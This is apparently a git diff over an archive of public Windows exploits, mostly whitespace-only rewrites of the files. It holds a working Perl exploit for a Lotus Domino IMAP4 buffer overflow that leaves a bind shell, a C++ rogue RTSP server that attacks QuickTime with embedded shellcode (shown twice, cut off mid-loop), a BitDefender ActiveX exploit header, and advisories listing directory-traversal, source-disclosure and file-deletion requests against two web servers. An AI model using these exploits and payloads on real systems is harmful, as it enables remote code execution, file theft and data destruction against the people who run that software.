+      "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV".
+      "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3".
+      "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo".
+      "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo".
+      "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp".
+      "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc".
+      "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M".
+      "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70".
+      "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs".
+      "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA";
+
+#
+# JUMP to 'ESP adjustment' and shellcode
+#
+$jmp = "\x74\x20".  # JE SHORT
+       "\x75\x20";  # JNZ SHORT
+
+
+#
+#
+# Don't edit anything after this line
+#
+#
+
+$sc_limit = 2300;
+
+sub usage {
+    print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n".
+          "Example: ". basename( $0 ) . " 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n".
+          "\n".
+          "Targets:\n".
+          "[1]  Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n".
+          "[2]  Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n";
+    exit;
+}
+
+
+# Net::IP::ip_is_ipv4
+sub ip_is_ipv4 {
+    my $ip = shift;
+
+    unless ($ip =~ m/^[\d\.]+$/) {
+        return 0;
+    }
+
+    if ($ip =~ m/^\./) {
+        return 0;
+    }
+
+    if ($ip =~ m/\.$/) {
+        return 0;
+    }
+
+    if ($ip =~ m/^(\d+)$/ and $1 < 256) {
+        return 1
+    }
+
+    my $n = ($ip =~ tr/\./\./);
+
+    unless ($n >= 0 and $n < 4) {
+        return 0;
+    }
+
+    if ($ip =~ m/\.\./) {
+        return 0;
+    }
+
+    foreach (split /\./, $ip) {
+        unless ($_ >= 0 and $_ < 256) {
+            return 0;
+        }
+    }
+    
+    return 1;
+}
+
+
+print "--------------------------------------------------------\n".
+      ' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n".
+      "--------------------------------------------------------\n\n";
+
+if( ($#ARGV+1) != 4 ) {
+    &usage;
+}
+
+$user = $ARGV[2];
+$pass = $ARGV[3];
+
+# Windows 2000 SP4
+if( $ARGV[0] == 1 ) {
+    $popad = "\x41" x 3 .  # INC ECX
+             "\x61" x 51;  # POPAD
+}
+# Windows 2003 SP2
+elsif( $ARGV[0] == 2 ) {
+    $popad = "\x41" x 2 .  # INC ECX
+             "\x61" x 52;  # POPAD
+}
+else {
+    &usage;
+}
+    
+if( ip_is_ipv4( $ARGV[1] ) ) {
+    $ip = $ARGV[1];
+}
+else
+{
+    &usage;
+}
+
+if( length( $sc ) > $sc_limit ) {
+    print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n";
+    exit;
+}
+
+print "[+] Connecting to $ip:$port...\n";
+
+$sock = IO::Socket::INET->new (
+    PeerAddr => $ip,
+    PeerPort => $port,
+    Proto    => 'tcp',
+    Timeout  => 2
+) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit;
+
+print "[+] Connected.\n";
+
+$mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . "\x44" x 3000;
+$sock->recv( $recv, 1024 );
+$sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" );
+$sock->recv( $recv, 1024 );
+
+if( $recv ne "a001 OK LOGIN completed\r\n" ) {
+    print "[-] Error: Invalid username or password!\n";
+    exit;
+}
+
+print "[+] Successfully logged in.\n".
+      "[+] Trying to overwrite and control the SE handler...\n";
+
+$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" );
+$sock->recv( $recv, 1024 );
+$sock->send( "$mailbox\r\n" );
+$sock->recv( $recv, 1024 );
+$sock->send( "a003 LSUB arg1 arg2\r\n" );
+sleep( 3 );
+close( $sock );
+
+print "[+] Done. Now check for a bind shell on $ip:4444!\n";
+
+# milw0rm.com [2007-10-27]
diff --git a/platforms/windows/remote/4579.html b/platforms/windows/remote/4579.html
index 78a7fcfd1..2d6f839a4 100755
--- a/platforms/windows/remote/4579.html
+++ b/platforms/windows/remote/4579.html
@@ -1,69 +1,69 @@
-
-
-
-
-
-
-# milw0rm.com [2007-10-29]
+
+
+
+
+
+
+# milw0rm.com [2007-10-29]
diff --git a/platforms/windows/remote/4594.html b/platforms/windows/remote/4594.html
index ed50365b5..5472b43df 100755
--- a/platforms/windows/remote/4594.html
+++ b/platforms/windows/remote/4594.html
@@ -1,44 +1,44 @@
-
-
-
-
-
-
-
-# milw0rm.com [2007-11-01]
+
+
+
+
+
+
+
+# milw0rm.com [2007-11-01]
diff --git a/platforms/windows/remote/4598.html b/platforms/windows/remote/4598.html
index ab24c026c..53be29945 100755
--- a/platforms/windows/remote/4598.html
+++ b/platforms/windows/remote/4598.html
@@ -1,31 +1,31 @@
-
    ------------------------------------------------------------------------------------------------------
- EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
- url: http://www.anydraw.com
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-11-02]
+
    +-----------------------------------------------------------------------------------------------------
+ EDraw Flowchart ActiveX Control (EDImage.ocx v. 2.0.2005.1104) "HttpDownloadFile()" Insecure Method
+ url: http://www.anydraw.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-11-02]
diff --git a/platforms/windows/remote/4651.cpp b/platforms/windows/remote/4651.cpp
index c46dcb294..61fb06cf7 100755
--- a/platforms/windows/remote/4651.cpp
+++ b/platforms/windows/remote/4651.cpp
@@ -1,265 +1,265 @@
-/*
-=============================================================
-Apple Quicktime (Vista/XP RSTP Response) Remote Code Exec
-=============================================================
-Discovered by: h07
-Author: InTeL
-*Tested on:
-    - Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec
-    - Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec
- 
-    - Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec
-    - Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec
- 
- 
-Notes:
-    [*] On Vista the QuickTimePlayer and the .gtx modules dont have ASLR enabled, NO RANDOMIZATION :)
-    [*]All the 7.3 and 7.2 DLL modules are SafeSEH enabled, except for the .gtx modules, that is how u bypass the SEH 
-    Restrictions in XP and in Vista!! so we use Addys from there.
-    [*]There are ALOT of filtered characters so choose your shellcode wisely or you will run into Access Violations
-    Since I didnt feel like wasting my time going through all the filtered Characters, go through it yourself.
-        - Here are some \x4b, \x59, \x79
-    [*]I did hit my shellcode but b/c i havent gone through all the filtered characters i got an Access Violation
-    in the shellcode
-    [*]Can be easily modified to keep accepting clients with a lil modding, do it yourself u noobs
-     
-    [***]Here is an example of how to embed a streaming the quicktime redirection to the RTSP exploit.
-    http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html
-    cough use w/ an iframe cough
-  
-    Shoutz: UIA, u kno who u ppl are
-*/
- 
- 
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib,"wsock32.lib")
- 
-int info();
- 
-#define port 554
- 
-char header_part1[] = 
-"RTSP/1.0 200 OK\r\n"
-"CSeq: 1\r\n"
-"Date: 0x00 :P\r\n"
-"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n"
-"Content-Type: ";
- 
-char header_part2[] =
-"Content-Length: ";
- 
-char body[] = 
-"v=0\r\n"
-"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" 
-"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\r\n" 
-"i=1.mp3\r\n" "t=0 0\r\n" 
-"a=tool:ciamciaramcia\r\n" 
-"a=type:broadcast\r\n" 
-"a=control:*\r\n" 
-"a=range:npt=0-213.077\r\n" 
-"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \r\n" 
-"a=x-qt-text-inf:1.mp3\r\n" 
-"m=audio 0 RTP/AVP 14\r\n" 
-"c=IN IP4 0.0.0.0\r\n" 
-"a=control:track1\r\n"; 
- 
-//Place Your Shellcode here but keep the name
-char scode[] =
-"\xfc\xbb\x9a\x15\x38\x92\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
-"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x66\xfd\x7c\x92\x96\xfe\xf7"
-"\xd7\xaa\x75\x7b\xdd\xaa\x88\x6b\x56\x05\x93\xf8\x36\xb9\xa2\x15"
-"\x81\x32\x90\x62\x13\xaa\xe8\xb4\x8d\x9e\x8f\xf5\xda\xd9\x4e\x3f"
-"\x2f\xe4\x92\x2b\xc4\xdd\x46\x88\x21\x54\x82\x5b\x76\xb2\x4d\xb7"
-"\xef\x31\x41\x0c\x7b\x1a\x46\x93\x90\x2f\x6a\x18\x67\xc4\x1a\x42"
-"\x4c\x1e\xde\x4a\x4c\x7a\x6b\xec\x7c\x07\xab\x95\x70\x8c\x6c\x6a"
-"\x02\xe2\x70\xdf\x9f\x6a\x81\xf4\xa9\xe1\x11\xba\xaa\xf5\x11\x30"
-"\xc2\xc9\x4e\x77\xe5\x51\x27\xfe\xf1\x12\x07\x7b\x52\x7c\x78\xf6"
-"\x56\x23\x10\x9f\xa9\x51\xee\xc8\xaa\x82\x9d\x93\x33\x29\x06\x35"
-"\xc8\x9f\xa3\xbd\x55\xdf\x2b\x3e\x96\xdf\x2b\x3e\x96";
- 
- 
-int main(int argc, char *argv[])
-{
-    char evilbuf[5200], recvbuf[512];
-    char *strptr = NULL;
-    char contentlength[] = "327";
-    int i, pos;
-    struct sockaddr_in saddr;
-    WSADATA wsaData;
-    SOCKET sock, vicsock;
- 
-    info();
-    if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
-        printf("Unable to initialize Winsock \n");
-        exit(1);
-    }
- 
-    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
-        printf("Socket Error \n");
-        WSACleanup();
-        exit(1);
-    }
- 
-    memset(&saddr, 0, sizeof(saddr));
-    saddr.sin_family = AF_INET;
-    saddr.sin_addr.s_addr = INADDR_ANY;    
-    saddr.sin_port = htons(port);
- 
-    if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
-        printf("Bind Error \r\n");
-        closesocket(sock);
-        WSACleanup();
-        exit(1);
-    }
- 
-   if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) {
-        printf("Listen Error \r\n"); 
-        closesocket(sock);
-        WSACleanup();
-        exit(1);
-    }
-    printf("[+] Listening on port: %d\r\n", port);
-    if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) {
- 
-        printf("[+]Victim Connected \r\n"); 
-        memset(recvbuf,0,sizeof(recvbuf));
-        recv(vicsock, recvbuf, 512, 0);
-     
-        memset(evilbuf, '\0', sizeof(evilbuf));
-        strcpy(evilbuf, header_part1);
-     
-        /*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/
-             
-        if((strptr =strstr(recvbuf, "6.0")) != NULL) {// Vista
-            strptr = NULL;
-             
-            if((strptr =strstr(recvbuf, "7.3")) != NULL) {
-                printf("Victim is running Vista and QKTime Version 7.3\r\n");
-                pos = strlen(header_part1);
-                for(i = 1; i<=991;i++) {
-                    evilbuf[pos] = 'A';
-                    pos++;
-                }
-                strcat(evilbuf, "\xeb\x32\x90\x90");
-                strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
-                pos += 8;
-            }
-            else {
-                strptr = NULL;
-                if((strptr =strstr(recvbuf, "7.2")) != NULL) {
-                    printf("Victim is running Vista and QKTime Version 7.2\r\n");
-                    pos = strlen(header_part1);
-                    for(i = 1; i<=987;i++) {
-                        evilbuf[pos] = 'A';
-                        pos++;
-                    }
-                    strcat(evilbuf, "\xeb\x32\x90\x90");
-                    strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
-                    pos += 8;
-                }
-            }
-        }
-        else { //Win XP SP2
-            strptr = NULL;
-            if((strptr = strstr(recvbuf, "5.1")) != NULL) {     
-                strptr = NULL;
-                if((strptr =strstr(recvbuf, "Pack 2")) != NULL) {
-                    strptr = NULL;
-                    if((strptr =strstr(recvbuf, "7.3")) != NULL) {
-                        printf("Victim is running XP SP2 and QKTime Version 7.3\r\n");
-                        pos = strlen(header_part1);
-                        for(i = 1; i<=991;i++) {
-                            evilbuf[pos] = 'A';
-                            pos++;
-                        }
-                        strcat(evilbuf, "\xeb\x32\x90\x90");
-                        strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
-                        pos += 8;
-                    }
-                    else{ 
-                        strptr = NULL;
-                        if((strptr =strstr(recvbuf, "7.2")) != NULL) {
-                            printf("Victim is running XP SP2 and QKTime Version 7.2\r\n");
-                            pos = strlen(header_part1);
-                            for(i = 1; i<=987;i++) {
-                                evilbuf[pos] = 'A';
-                                pos++;
-                            }     
-                            strcat(evilbuf, "\xeb\x32\x90\x90");
-                            strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
-                            pos += 8;
-                        }
-                    }
-                }
-            }
-            else {
-                printf("[-] Not a Valid Target, Shutting Down");
-                closesocket(vicsock);
-                closesocket(sock);
-                WSACleanup();
-                exit(1);
-            }
-        }
-         
-        for(i=0; i<200;i++) {
-            evilbuf[pos] = '\x90';
-            pos++;
-        }
-        for(i=0; i
+#include 
+#include 
+#include 
+#pragma comment(lib,"wsock32.lib")
+ 
+int info();
+ 
+#define port 554
+ 
+char header_part1[] = 
+"RTSP/1.0 200 OK\r\n"
+"CSeq: 1\r\n"
+"Date: 0x00 :P\r\n"
+"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n"
+"Content-Type: ";
+ 
+char header_part2[] =
+"Content-Length: ";
+ 
+char body[] = 
+"v=0\r\n"
+"o=- 16689332712 1 IN IP4 0.0.0.0\r\n" 
+"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit\r\n" 
+"i=1.mp3\r\n" "t=0 0\r\n" 
+"a=tool:ciamciaramcia\r\n" 
+"a=type:broadcast\r\n" 
+"a=control:*\r\n" 
+"a=range:npt=0-213.077\r\n" 
+"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit \r\n" 
+"a=x-qt-text-inf:1.mp3\r\n" 
+"m=audio 0 RTP/AVP 14\r\n" 
+"c=IN IP4 0.0.0.0\r\n" 
+"a=control:track1\r\n"; 
+ 
+//Place Your Shellcode here but keep the name
+char scode[] =
+"\xfc\xbb\x9a\x15\x38\x92\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
+"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x66\xfd\x7c\x92\x96\xfe\xf7"
+"\xd7\xaa\x75\x7b\xdd\xaa\x88\x6b\x56\x05\x93\xf8\x36\xb9\xa2\x15"
+"\x81\x32\x90\x62\x13\xaa\xe8\xb4\x8d\x9e\x8f\xf5\xda\xd9\x4e\x3f"
+"\x2f\xe4\x92\x2b\xc4\xdd\x46\x88\x21\x54\x82\x5b\x76\xb2\x4d\xb7"
+"\xef\x31\x41\x0c\x7b\x1a\x46\x93\x90\x2f\x6a\x18\x67\xc4\x1a\x42"
+"\x4c\x1e\xde\x4a\x4c\x7a\x6b\xec\x7c\x07\xab\x95\x70\x8c\x6c\x6a"
+"\x02\xe2\x70\xdf\x9f\x6a\x81\xf4\xa9\xe1\x11\xba\xaa\xf5\x11\x30"
+"\xc2\xc9\x4e\x77\xe5\x51\x27\xfe\xf1\x12\x07\x7b\x52\x7c\x78\xf6"
+"\x56\x23\x10\x9f\xa9\x51\xee\xc8\xaa\x82\x9d\x93\x33\x29\x06\x35"
+"\xc8\x9f\xa3\xbd\x55\xdf\x2b\x3e\x96\xdf\x2b\x3e\x96";
+ 
+ 
+int main(int argc, char *argv[])
+{
+    char evilbuf[5200], recvbuf[512];
+    char *strptr = NULL;
+    char contentlength[] = "327";
+    int i, pos;
+    struct sockaddr_in saddr;
+    WSADATA wsaData;
+    SOCKET sock, vicsock;
+ 
+    info();
+    if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0){
+        printf("Unable to initialize Winsock \n");
+        exit(1);
+    }
+ 
+    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
+        printf("Socket Error \n");
+        WSACleanup();
+        exit(1);
+    }
+ 
+    memset(&saddr, 0, sizeof(saddr));
+    saddr.sin_family = AF_INET;
+    saddr.sin_addr.s_addr = INADDR_ANY;    
+    saddr.sin_port = htons(port);
+ 
+    if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
+        printf("Bind Error \r\n");
+        closesocket(sock);
+        WSACleanup();
+        exit(1);
+    }
+ 
+   if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) {
+        printf("Listen Error \r\n"); 
+        closesocket(sock);
+        WSACleanup();
+        exit(1);
+    }
+    printf("[+] Listening on port: %d\r\n", port);
+    if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) {
+ 
+        printf("[+]Victim Connected \r\n"); 
+        memset(recvbuf,0,sizeof(recvbuf));
+        recv(vicsock, recvbuf, 512, 0);
+     
+        memset(evilbuf, '\0', sizeof(evilbuf));
+        strcpy(evilbuf, header_part1);
+     
+        /*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/
+             
+        if((strptr =strstr(recvbuf, "6.0")) != NULL) {// Vista
+            strptr = NULL;
+             
+            if((strptr =strstr(recvbuf, "7.3")) != NULL) {
+                printf("Victim is running Vista and QKTime Version 7.3\r\n");
+                pos = strlen(header_part1);
+                for(i = 1; i<=991;i++) {
+                    evilbuf[pos] = 'A';
+                    pos++;
+                }
+                strcat(evilbuf, "\xeb\x32\x90\x90");
+                strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
+                pos += 8;
+            }
+            else {
+                strptr = NULL;
+                if((strptr =strstr(recvbuf, "7.2")) != NULL) {
+                    printf("Victim is running Vista and QKTime Version 7.2\r\n");
+                    pos = strlen(header_part1);
+                    for(i = 1; i<=987;i++) {
+                        evilbuf[pos] = 'A';
+                        pos++;
+                    }
+                    strcat(evilbuf, "\xeb\x32\x90\x90");
+                    strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
+                    pos += 8;
+                }
+            }
+        }
+        else { //Win XP SP2
+            strptr = NULL;
+            if((strptr = strstr(recvbuf, "5.1")) != NULL) {     
+                strptr = NULL;
+                if((strptr =strstr(recvbuf, "Pack 2")) != NULL) {
+                    strptr = NULL;
+                    if((strptr =strstr(recvbuf, "7.3")) != NULL) {
+                        printf("Victim is running XP SP2 and QKTime Version 7.3\r\n");
+                        pos = strlen(header_part1);
+                        for(i = 1; i<=991;i++) {
+                            evilbuf[pos] = 'A';
+                            pos++;
+                        }
+                        strcat(evilbuf, "\xeb\x32\x90\x90");
+                        strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
+                        pos += 8;
+                    }
+                    else{ 
+                        strptr = NULL;
+                        if((strptr =strstr(recvbuf, "7.2")) != NULL) {
+                            printf("Victim is running XP SP2 and QKTime Version 7.2\r\n");
+                            pos = strlen(header_part1);
+                            for(i = 1; i<=987;i++) {
+                                evilbuf[pos] = 'A';
+                                pos++;
+                            }     
+                            strcat(evilbuf, "\xeb\x32\x90\x90");
+                            strcat(evilbuf, "\xb4\x45\x59\x67");//pop ebx-pop-retbis in QuickTimeStreaming.gtx
+                            pos += 8;
+                        }
+                    }
+                }
+            }
+            else {
+                printf("[-] Not a Valid Target, Shutting Down");
+                closesocket(vicsock);
+                closesocket(sock);
+                WSACleanup();
+                exit(1);
+            }
+        }
+         
+        for(i=0; i<200;i++) {
+            evilbuf[pos] = '\x90';
+            pos++;
+        }
+        for(i=0; i
- 
- 
-
-
- 
-
-
-
-# milw0rm.com [2007-11-27]
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+    BitDefender OScan8.ocx / Oscan81.ocx ActiveX Exploit
+ 
+=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=-
+ 
+http://research.eeye.com/html/advisories/published/AD20071120.html
+http://secunia.com/advisories/27717/
+ 
+ 
+This works not 100% - it corrupts random memory in the browser and Launches calculator with success.
+ 
+Users have had this installed since 2006!  With no autoupdates :)
+ 
+Google Search of BD OSCAN =  
+http://www.google.com/search?hl=ar&safe=off&rls=fr&hs=P4T&q=%225D86DDB5-BDF9-441B-9E9E-D4730F4EE499%22&btnG=Search
+ 
+Modify the values in these to help keep it stable:
+'SiteAuthority' - different memory address ?? - it turns values to literal address !
+while (SiteAuthority.length < 60000) - Maybe larger/smaller?
+ 
+ 
+Crashes IE even if it fails
+ 
+Tested with Forum XSS Injections + Wordpress 0day + CMS Injections
+ 
+Nphinity  
+#SAMAH/#SYR/#SHAHADA
+mesra.kl.my.dal.net
+ 
+ 
+ 
+ 
+=-=-=-=-=-=-=-=-=-=-=-=-PRIVATE! NOT PUBLIC!=-=-=-=-=-=-=-=-=-=-=-=-
+ 
+ 
+ 
+ 
+
+ 
+ 
+
+
+ 
+
+
+
+# milw0rm.com [2007-11-27]
diff --git a/platforms/windows/remote/4700.txt b/platforms/windows/remote/4700.txt
index aad483b70..d6ef7420f 100755
--- a/platforms/windows/remote/4700.txt
+++ b/platforms/windows/remote/4700.txt
@@ -1,105 +1,105 @@
-#######################################################################
-
-                             Luigi Auriemma
-
-Application:  Simple HTTPD
-              http://shttpd.sourceforge.net
-Versions:     <= 1.38
-Platforms:    Windows, *nix, QNX, RTEMS
-              only Windows seems vulnerable
-Bugs:         A] directory traversal
-              B] scripts and CGI viewing/downloading
-                 (%20 char found by Shay priel in Jun 2007)
-Exploitation: remote
-Date:         07 Dec 2007
-Author:       Luigi Auriemma
-              e-mail: aluigi@autistici.org
-              web:    aluigi.org
-
-
-#######################################################################
-
-
-1) Introduction
-2) Bugs
-3) The Code
-4) Fix
-
-
-#######################################################################
-
-===============
-1) Introduction
-===============
-
-
-Simple HTTPD (shttpd) is an open source web server created for embedded
-systems.
-
-
-#######################################################################
-
-=======
-2) Bugs
-=======
-
-----------------------
-A] directory traversal
-----------------------
-
-Using the "..\" pattern is possible to download any file in the disk on
-which is located the web root directory.
-
-
---------------------------------------
-B] scripts and CGI viewing/downloading
---------------------------------------
-
-Any script or CGI in the server can be viewed/downloaded instead of
-being executed simply appending the chars '+', '.', %20 (this one
-reported by Shay priel in the summer 2007), %2e and any other byte (in
-hex format too) major than 0x7f to the requested filename.
-
-
-Note that only Windows seems vulnerable to the above bugs.
-
-
-#######################################################################
-
-===========
-3) The Code
-===========
-
-
-A]
-http://SERVER/..\..\..\boot.ini
-http://SERVER/..\%2e%2e%5c..\boot.ini
-
-B]
-http://SERVER/file.php+
-http://SERVER/file.php.
-http://SERVER/file.php%80
-http://SERVER/file.php%ff
-
-
-#######################################################################
-
-======
-4) Fix
-======
-
-
-I have posted the problems in the shttpd-general mailing-list but there
-is no reply yet:
-
-  http://sourceforge.net/mailarchive/forum.php?forum_name=shttpd-general
-
-
-#######################################################################
-
-
---- 
-Luigi Auriemma
-http://aluigi.org
-
-# milw0rm.com [2007-12-07]
+#######################################################################
+
+                             Luigi Auriemma
+
+Application:  Simple HTTPD
+              http://shttpd.sourceforge.net
+Versions:     <= 1.38
+Platforms:    Windows, *nix, QNX, RTEMS
+              only Windows seems vulnerable
+Bugs:         A] directory traversal
+              B] scripts and CGI viewing/downloading
+                 (%20 char found by Shay priel in Jun 2007)
+Exploitation: remote
+Date:         07 Dec 2007
+Author:       Luigi Auriemma
+              e-mail: aluigi@autistici.org
+              web:    aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bugs
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+Simple HTTPD (shttpd) is an open source web server created for embedded
+systems.
+
+
+#######################################################################
+
+=======
+2) Bugs
+=======
+
+----------------------
+A] directory traversal
+----------------------
+
+Using the "..\" pattern is possible to download any file in the disk on
+which is located the web root directory.
+
+
+--------------------------------------
+B] scripts and CGI viewing/downloading
+--------------------------------------
+
+Any script or CGI in the server can be viewed/downloaded instead of
+being executed simply appending the chars '+', '.', %20 (this one
+reported by Shay priel in the summer 2007), %2e and any other byte (in
+hex format too) major than 0x7f to the requested filename.
+
+
+Note that only Windows seems vulnerable to the above bugs.
+
+
+#######################################################################
+
+===========
+3) The Code
+===========
+
+
+A]
+http://SERVER/..\..\..\boot.ini
+http://SERVER/..\%2e%2e%5c..\boot.ini
+
+B]
+http://SERVER/file.php+
+http://SERVER/file.php.
+http://SERVER/file.php%80
+http://SERVER/file.php%ff
+
+
+#######################################################################
+
+======
+4) Fix
+======
+
+
+I have posted the problems in the shttpd-general mailing-list but there
+is no reply yet:
+
+  http://sourceforge.net/mailarchive/forum.php?forum_name=shttpd-general
+
+
+#######################################################################
+
+
+--- 
+Luigi Auriemma
+http://aluigi.org
+
+# milw0rm.com [2007-12-07]
diff --git a/platforms/windows/remote/4713.txt b/platforms/windows/remote/4713.txt
index 3f3c9def2..552eaf3db 100755
--- a/platforms/windows/remote/4713.txt
+++ b/platforms/windows/remote/4713.txt
@@ -1,156 +1,156 @@
-#######################################################################
-
-                             Luigi Auriemma
-
-Application:  BarracudaDrive Web Server
-              http://barracudaserver.com/products/BarracudaDrive/
-              http://barracudaserver.com/products/HomeServer/
-Versions:     <= 3.7.2
-Platforms:    Windows
-Bugs:         A] directory traversal
-              B] scripts source visualization
-              C] arbitrary files deleting by users
-              D] NULL pointer crash in chat.ehintf by users
-              E] html injection in the trace viewer
-Exploitation: remote
-Date:         10 Dec 2007
-Author:       Luigi Auriemma
-              e-mail: aluigi@autistici.org
-              web:    aluigi.org
-
-
-#######################################################################
-
-
-1) Introduction
-2) Bugs
-3) The Code
-4) Fix
-
-
-#######################################################################
-
-===============
-1) Introduction
-===============
-
-
-Barracuda Drive is a commercial webserver developed by Real Time Logic
-and contains many features.
-
-
-#######################################################################
-
-=======
-2) Bugs
-=======
-
-----------------------
-A] directory traversal
-----------------------
-
-A directory traversal vulnerability is exploitable through the usage of
-a backslash or any other char major than 0x7f at the beginning of the
-URI.
-The directories must be delimited by backslashes (and not slashes) for
-exploiting the bug.
-
-
--------------------------------
-B] scripts source visualization
--------------------------------
-
-All the custom scripts in the server (like the LUA scripts with lsp
-extension) can be visualized entirely instead of being executed simply
-using a '+', a dot or any other char major than 0x7f after the script's
-name.
-
-
-------------------------------------
-C] arbitrary files deleting by users
-------------------------------------
-
-BarracudaDrive allows the admin to create users which can then access
-their personal folders, chating between them and so on.
-The problem here is that these authenticated users can delete files and
-empty folders anywhere in the disk on which is located their personal
-directory simply using the usual ..\ pattern.
-
-Note that is also possible to create directories in the disk using the
-same trick but this is not a real security problem.
-
-
----------------------------------------------
-D] NULL pointer crash in chat.ehintf by users
----------------------------------------------
-
-As already said the users can also chat between them using a simple
-web interface called Group Chat.
-In this case it's enough to avoid the passing of the Connection ID of
-the user in the URI for crashing the entire server due to a NULL
-pointer.
-
-
--------------------------------------
-E] html injection in the trace viewer
--------------------------------------
-
-BarracudaDrive logs any bad or wrong HTTP request received by the
-clients and the Trace page in the admin interface can be used to
-visualize these log files.
-The problem is that they are visualized as HTML and there are no checks
-or limitations on their content so a remote attacker can use this bug
-for injecting scripts in these files, for example for retrieving the
-cookie of the admin and gaining access to the server configuration.
-
-
-#######################################################################
-
-===========
-3) The Code
-===========
-
-
-A]
-http://SERVER/\..\..\..\boot.ini
-http://SERVER/%80..\..\..\boot.ini
-http://SERVER/%ff..\bdlicense.dat
-
-B]
-http://SERVER/lua.lsp+
-http://SERVER/lua.lsp.
-http://SERVER/lua.lsp%80
-
-C]
-POST /drive/c/bdusers/USER/?cmd=rm HTTP/1.1
-Host: SERVER
-Cookie: "use the real user's cookie!"
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 21
-
-dir=..\..\..\file.txt
-
-D]
-POST /eh/chat.ehintf/C. HTTP/1.1
-Host: SERVER
-Content-Type: text/plain
-Content-Length: 0
